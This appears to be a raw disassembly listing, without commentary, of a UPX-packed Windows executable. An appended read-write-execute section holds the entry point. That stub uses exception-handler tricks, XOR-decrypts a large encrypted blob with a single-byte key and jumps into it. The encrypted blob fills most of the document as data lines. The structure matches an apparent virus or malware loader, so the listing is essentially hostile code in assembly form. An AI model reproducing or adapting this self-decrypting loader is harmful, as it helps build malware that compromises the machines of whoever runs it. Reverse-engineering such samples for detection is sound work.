dd 0A97084AAh, 159F0895h, 0CA11E787h, 0BFAC1E1Eh, 0EAB705h
dd 80BD1BA6h, 5162C0DFh, 0B5DB431Ch, 0FC15A39Ch, 0E91A5624h
dd 0C8CDA45Bh, 0CC27DF71h, 5117EF40h, 0D1DD5B46h, 93B6CD00h
dd 5BAD1F43h, 0A76F790Ch, 414E3CD7h, 6949D0D1h, 11047677h
dd 0CB215B21h, 945B3E3Dh, 800AB72Fh, 0DB741AF2h, 157D4D4Dh
dd 90291FA7h, 0E99C0202h, 86CF5D5Ch, 0CBA4B792h, 0D7491E35h
dd 2FDF95E8h, 0AED1A7DCh, 83942220h, 3FDE582Eh, 50C9CC5Fh
dd 17931A98h, 8E138C61h, 0C895841Ch, 150Dh dup(0)
UPX2 ends
; Section 4. (virtual address 00018000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00002800 ( 10240.)
; Offset to raw data for section: 00018000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_idata2 segment para public 'CODE' use32
assume cs:_idata2
;org 31438000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 80h dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_3143821C
call sub_31438288
push dword ptr fs:0
pop ebp
sub ebp, 0FFFFFFF8h
jmp near ptr 323C7005h
start endp
; =============== S U B R O U T I N E =======================================
sub_3143821C proc near ; CODE XREF: start+3�p
push dword ptr fs:0
mov fs:0, esp
xor eax, eax
push eax
push eax
push eax
push 80000000h
push eax
push 80000000h
push eax
push 80000000h
push eax
push 8
push 100h
call $+5
pop ecx
add ecx, 47h
sub edi, edi
or edi, 243Ch
sub edx, edx
add edx, 0FAh
push ecx
loc_31438266: ; CODE XREF: sub_3143821C+58�j
mov al, [ecx]
xor ax, dx
xchg al, [ecx]
add ecx, 1
dec edi
cmp edi, 0
ja short loc_31438266
pop ecx
mov esp, fs:0
pop dword ptr fs:0
leave
jmp ecx
sub_3143821C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_31438288 proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov ecx, [esp+arg_C]
xor eax, eax
pop dword ptr [ecx+0B8h]
retn
sub_31438288 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 6Ah, 12h, 0FAh
; ---------------------------------------------------------------------------
cli
cli
cli
loc_3143829B: ; CODE XREF: .idata2:loc_3143829B�j
jno short loc_3143829B
fimul word ptr ds:0FADED17Ah
cli
cli
cli
cli
jp short near ptr dword_3143831C
; ---------------------------------------------------------------------------
db 62h, 56h, 0D3h
dd 0A671FAFAh, 0D78EFEDEh, 4A73A306h, 0FAFAD34Ah, 0D34E4273h
dd 427AFAFAh, 0FAFADED5h, 0F9F78F12h, 0FADECA62h, 0F8A171FAh
dd 0F211C905h, 0DECB6271h, 0C905FAFAh, 7B6FAFA1h, 61FEDE96h
dd 7BFAFA88h, 50AFA19h, 0FC177B05h, 71FABAEAh, 77FEDE86h
dd 0BACEC64Fh, 0FAFA43FAh, 5E09FAFAh, 0AEB4817Bh, 8F899392h
dd 0C6B971F7h, 9CE2FE77h, 0BFAAC27Bh
dword_3143831C dd 117BF28Eh, 0FAFAFBFAh, 0AA71188Fh, 7129F982h, 0B071DA88h
; CODE XREF: .idata2:314382A7�j
dd 0AB09F9E2h, 7B39F957h, 0BDFA0582h, 0E18F8E9Fh, 0AAF9827Bh
dd 8F999588h, 0FD827BE8h, 889E9EBBh, 827BF38Fh, 89899FF1h
dd 18FF8EFAh, 39A7A32Dh, 71DEF6D3h, 0F9A3DE88h, 0FE4DF509h
dd 0E68071B4h, 0CE7101F9h, 1209F97Dh, 0FAFAFAF6h, 899596B9h
dd 949BB29Fh, 0FA9F969Eh, 732C05A9h, 0BACFC67Fh, 0FAF712FAh
dd 88B9FAFAh, 9F8E9B9Fh, 949F8CBFh, 0A9FABB8Eh, 7F732C05h
dd 0FABACFBAh, 0FAFAF712h, 8E9FBDFAh, 8E899BB6h, 958888BFh
dd 5A9FA88h, 0BE7F732Ch, 12FABACFh, 0FAFAFA8Ah, 0DB8E3A7Fh
dd 0BE6F05AAh, 7FFABACFh, 77EA8F3Ah, 0BAEB287Fh, 5AA70FAh
dd 0FAFA9412h, 58611FAh, 0BACFC66Fh, 0CB7F0DFAh, 0FAFABACEh
dd 8E7AFAFAh, 0CF4F77E4h, 71FABACEh, 5EFEDE86h, 4867715Fh
dd 71FABAC3h, 0BAC34C4Fh, 404771FAh, 0A7FABAC3h, 0FA90A039h
dd 0FA90FA90h, 0FB92FA90h, 71FAFEFAh, 0AAFA903Eh, 3E71F690h
dd 0AEAC1805h, 0FAFAC9A5h, 201233C9h, 77050505h, 0BAEB5B6Fh
dd 0ABABA8FAh, 0BA6F05AAh, 79FABACFh, 7039DA3Eh, 0D8A54308h
dd 0EACAFAFAh, 182CF8BAh, 0D7543903h, 0DC577003h, 410938EEh
dd 2C9295B2h, 0FCBF4B7Eh, 0BC6250D3h, 309BDD85h, 85C1A016h
dd 0B48BE9F4h, 0E5FCB569h, 0F6F9786Eh, 0FE1D28A7h, 0B7B8C87Ch
dd 0C5DCC507h, 0AA08980Eh, 8FB726C1h, 0D57A68CDh, 298AC5AFh
dd 0D187B82Eh, 0AC12150Dh, 491781CDh, 3CA2A51Eh, 0DAC2C63Fh
dd 937220D5h, 212EFDE1h, 0B4C3B026h, 70CEF7B1h, 679240F6h
dd 74B09C79h, 7C4A1385h, 4D6218DEh, 4C873093h, 3D34C05Eh
dd 9C28F0A6h, 0D142AD11h, 0EC578076h, 8AEB4C71h, 31F5EF39h
dd 44BA58BBh, 0F51D2B56h, 943AE2EAh, 0CC82DD67h, 0B147786Eh
dd 6C52D2F5h, 56A5AD4Dh, 7782BC85h, 77E2F2B2h, 19BFB956h
dd 0D43A32E3h, 0E049DBD5h, 9A1AEFE7h, 0C4051CF1h, 0F49B48FDh
dd 9B205B9h, 40A9D8CEh, 0C3B2A5F6h, 0EB44CA9Ah, 5C682799h
dd 0A422F9C4h, 841240F2h, 34DB883Eh, 49724579h, 4EF188Eh
dd 0F237E419h, 549057A1h, 9C4298F6h, 0E4E038EAh, 7BDE68F7h
dd 1C4AC914h, 0BC6310C7h, 31FACDF1h, 469AA016h, 6B3AE99Eh
dd 9CB76073h, 24CF902Eh, 38FBC076h, 0DEA5F740h, 0F6410906h
dd 0D1159224h, 8C72D52Ah, 57B9D935h, 5CF7009Bh, 0E005B86Eh
dd 53ADFE81h, 0F49A4E16h, 78B6DE46h, 7B2A94C2h, 8C47A843h
dd 670FE51Eh, 6F02F071h, 74F77567h, 5D9200C3h, 72321B35h
dd 0FF22D084h, 845FE073h, 88BD6016h, 0AB05565Dh, 0A996752Dh
dd 947538AEh, 0B9570F37h, 0FF1A884Dh, 0FC57F843h, 5DAA70Eh
dd 7F1025D9h, 11B1E8DEh, 0DCC2053Eh, 0ABCB08D1h, 2C2129F3h
dd 68D783BEh, 1FA21033h, 459B6747h, 0BFC46519h, 2692289Eh
dd 913D8FDBh, 243CF6D3h, 0C69D8BB6h, 0B43BEFEh, 0DD619436h
dd 876AB28Dh, 0CC18772Fh, 0A1377074h, 5C42A5F9h, 0A44AE417h
dd 6146CBF6h, 0CB24C53Ah, 0D7442F79h, 0C4271C43h, 6AB26016h
dd 50BD25F5h, 30A6C20Dh, 1F689388h, 0E2BA805Ch, 0FF1AC817h
dd 37627A0Ah, 6CAA32CAh, 44F2A056h, 0C66BA8F4h, 23D23E8Ch
dd 64FF98BBh, 0A8919876h, 0DD9460FEh, 28295006h, 88619824h
dd 8C58A0FCh, 0BE282AB4h, 750C1826h, 6460B86Eh, 0FCAD6AE7h
dd 0C17EDD01h, 65BD9006h, 25270Bh, 338DDDF1h, 4BADD93h
dd 28BBB026h, 2F4AF8A4h, 6D37B319h, 74CA88D3h, 30A75D86h
dd 3B6A58DAh, 0EC27EDF6h, 6FAE846h, 0A9DE6559h, 0F26238AEh
dd 60D28036h, 171A711h, 0D51040B6h, 61C63178h, 2DA4C531h
dd 0D55F9DF2h, 497D60E6h, 248A4D66h, 595E45FFh, 0E00A08FEh
dd 3C8706Ch, 71060DB1h, 4CB7E0D6h, 42455D81h, 4A94724Ch
dd 65606CE5h, 0AC43E8E4h, 91C948FEh, 4980F502h, 0ED5888E9h
dd 0A91E49A0h, 42BA0D79h, 694E2599h, 60C1F8EEh, 0BCC416A0h
dd 0A125DF68h, 7C62E556h, 937ADC4Dh, 398EF5E9h, 5490A81Eh
dd 9BDF2CCh, 0E4CA0D9Eh, 2CD3A88Fh, 95315F7Eh, 0E8461C4Fh
dd 0A83FA759h, 7FF2E063h, 0A89F6B68h, 0DC8270D0h, 0B1352F7Ah
dd 6C52F5C6h, 0E82EC83Bh, 0F85CD340h, 3015763Ch, 8C58E8B2h
dd 418502B4h, 1C82458Eh, 0B87E78EBh, 0A86FE825h, 3DA948FEh
dd 5D273D7h, 0C41CE40Bh, 4D5A55D6h, 14B7C6DFh, 0C56E066h
dd 0F41AA9F8h, 8407BFA5h, 0B1DAC80Bh, 73568946h, 0CC4E6C31h
dd 3A8EE599h, 0F812A81Eh, 0CFBD0F5Bh, 0D1B6AD11h, 0B4398076h
dd 75320CFFh, 433510C6h, 449F649Bh, 0B7174956h, 0DDB71761h
dd 84DA68E6h, 24E3B62Eh, 6C1FA576h, 0B45A09BEh, 0FCA25006h
dd 44EA984Eh, 0DF64B196h, 0E132BD21h, 45697066h, 11CA3CC2h
dd 6FBCE24Dh, 87FB0AA2h, 5183DE23h, 0E665BCEBh, 0B81145BCh
dd 27ED346Dh, 3554EF54h, 0A43F8CDCh, 9EE6339Ah, 34B4ED52h
dd 1D47A2C5h, 0AD2C7DBAh, 0CF3057Ah, 359FDA1Dh, 0F50495D2h
dd 85C75D82h, 42BBF046h, 371A8919h, 0C80375B4h, 6BD8086Bh
dd 3F81C535h, 0E679E8DFh, 0B9F65183h, 4BA71D7Ch, 446A502h
dd 0D03B6DCCh, 99D01306h, 108FEC2Fh, 0ED5792FEh, 0A63928BAh
dd 79B61143h, 865D73Ah, 0DC3E65DEh, 9AC97ACDh, 5491E027h
dd 0C12AACE1h, 980649AEh, 75DF1A76h, 3544B002h, 0CD1E9DC2h
dd 83C6259Bh, 40A9F16Dh, 1576BDE3h, 836A7DA3h, 65F41473h
dd 20BBCD32h, 0FE2B82D2h, 97EF4C9Bh, 49958077h, 18738E0Ah
dd 0C60B43A3h, 61ED586Bh, 209BE622h, 0F953BCFBh, 0B9C53083h
dd 40A5355Ah, 2477AC03h, 0D83E66DFh, 0BBA21163h, 21BEEC2Bh
dd 0E57490FBh, 0B5344DB2h, 1C83154Bh, 307EDD29h, 0FC226DD3h
dd 0B5F23C9Fh, 4887D746h, 0F758BDD8h, 0CC1C4FBFh, 42CE0D59h
dd 3571C203h, 0DC0F96C1h, 83DE40B7h, 5D96EC5Fh, 0E43A2E4h
dd 896A59B7h, 65E41077h, 32B5DF3Bh, 0F92E99E0h, 81FA77EEh
dd 40BBC658h, 47B851Bh, 0DB0C79B6h, 74E5584Fh, 3EA2CE33h
dd 0E75F8BF1h, 0AED23095h, 57AF1B41h, 2A20F305h, 0C0297AD7h
dd 93D00006h, 3799FD2Dh, 0E97CD2A5h, 877A5CA6h, 75840443h
dd 104BDD02h, 0CE3B72C2h, 87FF3C8Bh, 59B19007h, 0E8439EFAh
dd 0A11B74B3h, 78E9687Bh, 5C72D503h, 0D03981FDh, 85C62D93h
dd 5B8EED53h, 194EB9C0h, 0A107719Ah, 61DC3516h, 3DACD83Fh
dd 0FA0D87C3h, 81E651A8h, 5EBBD636h, 187BBD0Ah, 0D30E7C87h
dd 76FD586Dh, 0A97D43Fh, 945F84F7h, 0B8C344A8h, 50B90D44h
dd 1A7BB226h, 0D33F64D7h, 93F62363h, 4484FD25h, 0FE7194D8h
dd 0B10E49BBh, 79AE1960h, 277EF66Eh, 0D83365C4h, 9BE8189Bh
dd 4F91F525h, 0C75E968Eh, 0B81345A4h, 7BC8387Bh, 2F71D505h
dd 0EA4A80EBh, 89E00382h, 67BFFC5Fh, 1556B3E3h, 8A6A76A1h
dd 7CD32D62h, 239FC108h, 0F91196E9h, 8BE34C8Dh, 589C8058h
dd 1A7FB831h, 0D90E7980h, 4BDE160Eh, 1C9CC526h, 0F15987ECh
dd 0B3D64395h, 24A41D45h, 1E42B438h, 0D73F7CD1h, 8ECB0672h
dd 288BED3Ah, 0E35F85DBh, 9A7A51ACh, 75B02752h, 0D5CDD1Ah
dd 0CD2774C4h, 99FF0592h, 3C9BE229h, 0D146ACDCh, 0A31149B8h
dd 60E90D7Ah, 3B6CD914h, 0CA0B97FAh, 98C12985h, 53B4E14Ch
dd 3D718786h, 0B60B6C9Dh, 0CC21562h, 2795C43Dh, 0FF2D83C3h
dd 0E4FE5D85h, 42BCEF55h, 746EAB1Bh, 0D41675A1h, 66DE2B61h
dd 2193CE2Fh, 0F148E8FBh, 0AF824685h, 24AE164Bh, 771AF05h
dd 0FD5A7CDBh, 8EC72468h
dd 79EFD20h, 0E9418FFAh, 0B0144996h, 55C2154Ah, 166FCC00h
dd 0EB2665D8h, 9BD93C9Bh, 5F87FE28h, 0D74EBDFAh, 0A90641A2h
dd 60D4211Eh, 396CC203h, 0C13AB7DAh, 0A5920198h, 46BFFC50h
dd 3356B5E8h, 91047DBEh, 0CF30C64h, 318EC617h, 0E8279ED4h
dd 80EB5DBCh, 49BEE970h, 225E897Eh, 8F2B4087h, 48EE763Ch
dd 29A0A01Ah, 0FB56ABF9h, 0B9C95595h, 41987857h, 9628F11h
dd 0CD3F43D0h, 0FCE32843h, 158DFD1Ch, 0F54085E3h, 0A1164988h
dd 5DBA3543h, 36FEA6Eh, 0FA2665E5h, 91EF249Fh, 3CA3E803h
dd 0AF2F310Dh, 0CC1A711Eh, 9952681Eh, 3601942Ah, 0F54F92AEh
dd 0E9F813A6h, 0BF8A44B5h, 16768052h, 9738498Eh, 3942F5E9h
dd 9079A81Eh, 68D70FAAh, 678A78DBh, 7B1188F2h, 61AB4DF3h
dd 43511086h, 6EAA325Eh, 0E8675F58h, 113AA8ABh, 4C063F26h
dd 74CA782Eh, 6C7B0E1Eh, 0DE8E83BEh, 966EDB06h, 44EAF00Eh
dd 8E58E086h, 0BC7A428Ch, 1CC219E8h, 375BB804h, 48C7FFE6h
dd 0AB9A08CBh, 776F1Fh, 12A98BBh, 472E5429h, 54AFE093h
dd 0D10E5366h, 0E45AF83Bh, 0BB4343F6h, 0BF08776Dh, 3C170403h
dd 50E595CEh, 0E4B26035h, 0AB05570Ah, 0A9AA752Dh, 6B0738AEh
dd 2CD2A3D7h, 8BE58B96h, 64E79B39h, 89AA183Bh, 4CD148D9h
dd 6B08009Eh, 5909CF19h, 248A4DF2h, 676600F3h, 97AF8733h
dd 0E14A5006h, 0CF1567B1h, 0D9F1BF51h, 0D47A2836h, 0F1432D26h
dd 644AA27Ah, 29DFC985h, 0F4DA5550h, 6DB3C417h, 7B7B89DEh
dd 8C474C43h, 30BEEF1Eh, 693E2599h, 6617F8EEh, 4C740F2h
dd 34DA883Eh, 3FCF51DBh, 0AE6A58D4h, 227EDE9h, 4FAE844h
dd 0B8623DF4h, 678A12EEh, 0EBB48CF2h, 34009CFBh, 7B42DDC6h
dd 44B00E8Bh, 66F28456h, 0FEF9B59Eh, 23835AE7h, 20B9871Dh
dd 0AC97D589h, 0BF32F8CAh, 77A25006h, 14E9C39Eh, 0FE876DAAh
dd 5F7A68C4h, 1CC37C9Ch, 6C80336Eh, 0AF5200B7h, 94516306h
dd 9A115BCDh, 0C32FACEFh, 0E99D534h, 43B5AF9Dh, 0D75164EDh
dd 0CE1EA862h, 86C011B6h, 0C44F77C1h, 0FF2290B3h, 51E1140Ah
dd 0CF25562h, 0BE797F75h, 0F64537A1h, 6D8AD0EEh, 46118361h
dd 7DF29064h, 316210C6h, 0FA00394Ch, 8F02D59Fh, 0A27C7DF7h
dd 588730A6h, 0AD887026h, 2C2486E3h, 77B8FFBEh, 0FCA2B853h
dd 0C5B7984Eh, 0CC29E97Bh, 9EE7A3DEh, 9FC23010h, 64029C12h
dd 0ACEB84B9h, 181B48FEh, 3CE2924Eh, 852EB0DAh, 598D20D6h
dd 14FA5D8Eh, 0D88F4CEDh, 0A44BFC8Ah, 0ECF810F6h, 34DA8CD6h
dd 28708686h, 51954FCEh, 0CF2559Ah, 0C377616Dh, 9C42F1A2h
dd 0E6E069BFh, 44D3EA67h, 341AC87Eh, 0E0F7EF94h, 92AA183Bh
dd 178656D3h, 9052BCCEh, 8B8230E7h, 4EECCD1h, 9312C074h
dd 0F46C202Bh, 3C270906h, 50098E3Ah, 0E6E66BC6h, 832B7ADEh
dd 0D0578F70h, 3D0AF85Bh, 7C27C033h, 0C80FB7A8h, 0B1E2D073h
dd 0D3789CD9h, 412A64BCh, 14BB6C89h, 9C311B66h, 5713E8C4h
dd 0BCC2105Dh, 648AD86Eh, 18B72FD4h, 456A58FBh, 0CB068D2h
dd 708E575Eh, 84D70FAEh, 0B78A78D8h, 1ACA15C9h, 0B647C83Eh
dd 82E210C2h, 42AB2D04h, 59762DDDh, 8DD9E8DEh, 0CC82A56Bh
dd 0F5C9786Eh, 0E8C03F20h, 0ABD2077Eh, 0F3A25007h, 44EB88CAh
dd 0B60C6096h, 543C38ABh, 98CD7018h, 640AB96Fh, 0D9723E36h
dd 0CA1B0E0Fh, 7BACD916h, 4BA19AFBh, 83736610h, 7EEBA635h
dd 0F54E166h, 925A6D51h, 0D7CB40B6h, 0EB5F87FFh, 0F122D086h
dd 8477BA4Bh, 64B20A16h, 54FAA852h, 9BDA3F6h, 0E4CA0EFEh
dd 2CD28C0Bh, 0CB9FC77Eh, 556210C6h, 4AA58BFh, 1EA29ED7h
dd 1135BED7h, 0DC823043h, 88C2BEADh, 0E81DCD4Ah, 0B45A0827h
dd 0FD7703Ah, 4BD0A4E2h, 8C326C13h, 0F47785DEh, 21E25006h
dd 106FDF4Fh, 90FE7FC3h, 75E63DDEh, 54C26F38h, 0F55FACFAh
dd 0BC715E57h, 61954724h, 0A345760Eh, 1E7BF7AEh, 0EC9267E6h
dd 0CB886AC9h, 3C176C13h, 94AA2BCEh, 0E4E23046h, 54FAA857h
dd 0F2359FE2h, 80EB5782h, 0C477F36h, 0F11A8848h, 8F546406h
dd 4E2FD1C7h, 1DF2E060h, 9438E8F6h, 8AD36166h, 5F877Eh
dd 0E1128040h, 0F4410B2Bh, 35910006h, 16BAC91Ah, 19CDB1C7h
dd 0D43A1DB2h, 0E3E674A1h, 243F84FBh, 2C91F8B6h, 0B48F3F73h
dd 0FF1B9146h, 0D06C97DDh, 89206181h, 77D32542h, 3371DF14h
dd 0F3168CC8h, 83F62E9Fh, 7786FB49h, 1950A2F3h, 0A13C6CA0h
dd 63DB1364h, 2CBFF430h, 0EE2D9CD6h, 0B08A4A8Bh, 49B5F257h
dd 775800Ah, 0BC6010B2h, 4AAA8F1h, 3E82A056h, 0F95390F1h
dd 0BFF059C8h, 45A61949h, 1C3CB90Eh, 0FD1408D2h, 8C821B45h
dd 2389E023h, 864794FCh, 863F7B8Bh, 2EF21906h, 553A8D5Eh
dd 82722E96h, 0BEB772DEh, 1CACD909h, 0F643AEA8h, 997855A2h
dd 14BA68F6h, 0B183ED66h, 0A40AE51Ah, 0F9E5C530h, 0CBDA887Eh
dd 3C174413h, 0DB82D9CEh, 12D85C62h, 61AA1DD5h, 301BF0E6h
dd 0CEFF16D2h, 0D3EC0150h, 0F939BD63h, 0FC54507Bh, 6DCD30Eh
dd 0E9940501h, 0A7506D13h, 590D30A6h, 248A4BBEh, 9654498Ch
dd 4FA44632h, 334051B7h, 0C167DBA5h, 8C72F527h, 0BE7A428Eh
dd 0B8578F28h, 0E70AF85Bh, 0A85A24CAh, 0F072638Bh, 6FE29046h
dd 7B2A9BC8h, 8C47A843h, 0E8F2801Eh, 5BEA4F99h, 0F74AF8AEh
dd 0A3CD03B0h, 0A125886Dh, 7C62E50Eh, 3B962926h, 0FFE488E9h
dd 0D90557A1h, 9C02E3A5h, 0E48A3306h, 6981D536h, 5A28FB2Ch
dd 0BC2E5C82h, 3136CDF1h, 461AA016h, 0E33AE89Eh, 0B5F04095h
dd 65AC0C40h, 0F9ED9076h, 0B41A3DF6h, 0C9F6D58Fh, 75E5980Eh
dd 94D26D1Bh, 51F3289Eh, 1C824660h, 0F89F473Fh, 3F524083h
dd 0F49A4C96h, 0D1571D46h, 0DD2A9896h, 0FA5E9D5Bh, 0C252685Eh
dd 3AFD4F90h, 0B92D7D69h, 1C6D40B6h, 29B32DBDh, 0F122D0C6h
dd 84773F5Bh, 66E63016h, 6FAC25Fh, 9C42F2CEh, 0D41FC76Eh
dd 0A9D2C000h, 566F92BEh, 0A1389D4Bh, 6EF8584Eh, 2B472D50h
dd 0C03AA883h, 8DD260B0h, 105F877Ch, 34128040h, 82769D41h
dd 79645046h, 44AAA003h, 8C3E0896h, 872D28DEh, 2F893369h
dd 284E965Ch, 39AD00FAh, 0F4DA7D62h, 3CE5F8D5h, 31A7D88Eh
dd 0CC323892h, 0E807E547h, 0B402F053h, 5BB50EFFh, 0EC924C1Eh
dd 7A93DF3Eh, 28679ECFh, 88265CE0h, 90279F16h, 0D1FAE86Bh
dd 7BC6FF66h, 778A38EFh, 2CD2855Eh, 0F6AF457Eh, 0E56250DEh
dd 32B2E583h, 561AA016h, 17C51768h, 9CB42C5Bh, 0A0C5782Eh
dd 6C12C1B4h, 0B5CAE43Fh, 94F65006h, 44EA994Fh, 0B9CE7569h
dd 10FB289Eh, 1CC271B6h, 0EDE333Eh, 39AD52B6h, 0F4DA7EE2h
dd 49BB50C3h, 97A2B083h, 598D20D6h, 14FA5DA2h, 0E181528Dh
dd 0A40AE5C7h, 61BB35F6h, 74C7E5BBh, 0E9DD8086h, 0C42A2EC6h
dd 88BDA093h, 54FAA965h, 174EB02Dh, 6BBAC7EEh, 6CCFE9B3h
dd 399F0E7Eh, 0BD6250FEh, 5C05864h, 0D90DA23Ch, 947ADE8Ah
dd 0D37DC865h, 24CB6AAAh, 0F99F5376h, 0B41A15DBh, 0AFF0406Ch
dd 72EE0DB1h, 4CB7E0D6h, 0D488ADD1h, 0A14F7026h, 644AA5E8h
dd 10BA0807h, 9C65B704h, 3CE290D2h, 0DCCF3D0h, 332604E2h
dd 548FF08Bh, 0C8BF3D66h, 154AB8B3h, 160FA8F7h, 705177C1h
dd 9CE3C0A2h, 0E02E13C6h, 452A112h, 5CDEEC55h, 9C4718F6h
dd 0CAAF38EEh, 7BD2F800h, 414E5D81h, 78E11086h, 2ED9E02h
dd 0CD672D76h, 0FE3AA883h, 0DCA358E6h, 7798782Eh, 5A025589h
dd 0C8D708FEh, 3F54422h
dd 4DFC0DBh, 0B4362696h, 0D41068D4h, 0E3912776h, 243CA8FBh
dd 21B403B6h, 0B487EA43h, 54E2FA46h, 842AD882h, 598D7381h
dd 14FA5E0Eh, 5C02BC5Bh, 29078DAEh, 0ACA40E43h, 7957053Eh
dd 572290BEh, 956A7200h, 994D3340h, 54BA9E52h, 0E2420825h
dd 1A01A9C1h, 1A9C35BBh, 79AAC83Eh, 0AC17BE34h, 0FE52B06Eh
dd 3E935FA9h, 19330B89h, 36693191h, 0EAE1B7A5h, 5A5C7DFBh
dd 10A908FEh, 4549A781h, 447F671Dh, 0C32A0A0h, 946F5F63h
dd 36B67126h, 647F8806h, 10C7FFB6h, 749A08CBh, 7CDADDFBh
dd 955ED88Eh, 0D11BA511h, 14BA685Eh, 0D9C4B066h, 0A40AC0E3h
dd 12C4A9F6h, 0B11D77C1h, 7C62C506h, 446A18CEh, 0CB6A24Bh
dd 74B5A253h, 0F22D9FC8h, 0C4EC57CEh, 49B4E95Ah, 5455E85Fh
dd 0D90F79B2h, 24C52C2Eh, 299EC535h, 0E05B9AFCh, 0D68F1183h
dd 4EA580Eh, 1F328F56h, 0D13765CBh, 9DC57074h, 2A8FFC3Ch
dd 0DE38EDB7h, 0BA1F44BBh, 6FA71C52h, 4473D41Dh, 0DC2261DEh
dd 9AFB6887h, 4487B022h, 0F049BDFEh, 0E0064EB7h, 75CE1B3Eh
dd 326BD408h, 896AC2C9h, 8DC54AFBh, 5DB2EB4Ah, 1D02B7E8h
dd 0A04A74A2h, 6D921977h, 3ADACC30h, 0E82A97CFh, 8BEC18C2h
dd 5EB4A044h, 1074AD17h, 9C2B30B5h, 70C33979h, 1BF8AD6Ch
dd 0F1488DF6h, 0B9F051C6h, 51A5010Eh, 1E74E05Ah, 0D0346DD7h
dd 0BF826F75h, 658FF521h, 0AC46A9B6h, 0A05A5BB7h, 3DA71D4Fh
dd 437EF14Eh, 0CD3E20C5h, 0F9BB2D8Ah, 0FB66944Ch, 1A141BEh
dd 180BCD0Dh, 23E82051h, 0FA169926h, 0CAB392BEh, 9F533E96h
dd 0AD77CF24h, 0CDD835E4h, 1B98E8E9h, 0A7EB37FDh, 0F2EEBB64h
dd 0F08EACB6h, 0EA50B72Ch, 0AB922C23h, 0CCA99A59h, 0BC62101Eh
dd 4AA580Eh, 4CF2A056h, 943AE89Eh, 0DC8230E6h, 24CA782Eh
dd 6C12C076h, 0B45A08BEh, 0FCA25006h, 44EA984Eh, 8C32E096h
dd 0D47A28DEh, 1CC27026h, 640AB86Eh, 0AC5200B6h, 0F49A48FEh
dd 9961F046h, 846AE128h, 66D7A3D6h, 14BA2827h, 48410769h
dd 0AB52AB23h, 0EF940B41h, 109E03EEh, 7060FBA2h, 865101BCh
dd 87A6131Eh, 16D1BC1Ch, 3AD779AAh, 6D8A78D7h, 6CEB2AB3h
dd 0F71F237Eh, 65803804h, 4AE9A6Fh, 6E0525DEh, 0F0D2E8DEh
dd 0B48230E6h, 24CA780Eh, 4E3645FBh, 8D0308FEh, 7FAE241Eh
dd 0B3089C8Eh, 0B5BC6569h, 23B9289Eh, 0EB4F73FFh, 870AF84Ch
dd 5022FFA6h, 1C194871h, 0B5147242h, 0C408FC13h, 0CC48A3D6h
dd 26916D6Ah, 0D112C265h, 0FF1204E0h, 0ECA8C3A8h, 6258C4Ah
dd 0EDDD36Dh, 3B3DF0DEh, 0C2999FE9h, 6D502575h, 9F1AF0E6h
dd 6B490CA5h, 6CEB12B3h, 0FA9F0F7Eh, 0BC6250FFh, 0ECAA580Eh
dd 4CF2A06Ah, 0ADB46D15h, 0A96A30A6h, 0CC3587D9h, 6C12C06Eh
dd 8DD4B53Dh, 89A25046h, 0E4771146h, 6732A0B4h, 5AF7D742h
dd 0DFC2301Fh, 5D983DE1h, 39DB00F6h, 0F4DA7170h, 3CE293AEh
dd 47E3EB8Eh, 0CCF2B35Dh, 0FCE8681Eh, 0A3FD4E8Bh, 9DE06DADh
dd 3A9140B6h, 34D6F2BDh, 7D255489h, 0BEE918CEh, 88BD6006h
dd 54FAA8A3h, 0CC4EB22Dh, 1B74F006h, 865783C9h, 771A8847h
dd 0B4E84000h, 70AAA18Eh, 620B204Fh, 7F7AEBEAh, 0DDCABB17h
dd 0FB1599AFh, 95931FA9h, 0B41644FAh, 0D7FBBC73h, 0BE131B86h
dd 8C856F99h, 551C28DEh, 2EF18E5Eh, 64A13D61h, 2F0400B6h
dd 0F1EF48C4h, 0D7F2DACDh, 8720538Ch, 0BE9A7127h, 174597E0h
dd 1C3B1AD3h, 64CF55AEh, 689DBB8Eh, 34DA88BAh, 45886579h
dd 2C3A188Eh, 0F34D9E43h, 6D502D5Dh, 19CDF0E6h, 0E4CA0144h
dd 7FF68435h, 471808FDh, 0B4D41F1Dh, 0CD2A4AEDh, 6833F376h
dd 8813ECBAh, 0F88E19C2h, 0CD213875h, 0BB1D3BF7h, 8A2ED505h
dd 0B90AAB87h, 729E4320h, 0B76B1B17h, 0FA0ED77Fh, 3E148BA7h
dd 427E14DBh, 45C1FB37h, 0EAEEBBA6h, 0D59F6BC7h, 925E2BD6h
dd 0F334DB57h, 1ACE893Bh, 63324BE7h, 0A23E198Bh, 0D500D509h
dd 0DD81887Eh, 83DD2FF7h, 0D0A89B90h, 0F34C8FFFh, 3EFA6BA1h
dd 89AAA8A2h, 6C75C718h, 6CF651A3h, 45A2AE7Eh, 7C8012DEh
dd 0E6A85BEAh, 4A980B30h, 61C000C6h, 1E01CF19h, 4E1BFF26h
dd 81FA9873h, 34A5F74Bh, 0F7D153FCh, 0C1E8C8FEh, 8C72C447h
dd 0BE5DC374h, 9C68284Eh, 7C7FBB94h, 61BA1106h, 4C65B70Bh
dd 3CE29047h, 895E0A0Ah, 68CC007h, 11519EF5h, 5C02B0DEh
dd 1BA8532Eh, 0D02FCD35h, 0C3DAC80Ah, 3C16E103h, 0C46A18CEh
dd 0BCB11496h, 0D10D023Eh, 9C02C497h, 0E58A38EDh, 2C240439h
dd 21A2C87Eh, 178AFC4Dh, 9217D1A5h, 0FCF2E06Fh, 63914276h
dd 9CB60163h, 24CA782Eh, 0F6AF4977h, 0C05A4887h, 0CD27A74Dh
dd 44EAD87Ah, 3430E096h, 0E2854CB9h, 7B7A7553h, 0CF24330Ah
dd 0AC52B8D0h, 0F7EEE398h, 0CB48CDF6h, 0C41EE90Bh, 0CC7220D6h
dd 7937D016h, 4A77B06Eh, 907B7D59h, 0EC9240B6h, 0B7628C3Eh
dd 822D843h, 29E9A0CBh, 431960EEh, 60CB2DA9h, 9C41F0E6h
dd 0E0FE38EEh, 87786986h, 4D8C4DF5h, 73E91086h, 4C239025h
dd 7D7757AAh, 973AA8AAh, 0A88230E6h, 40ADC071h, 0D19BF689h
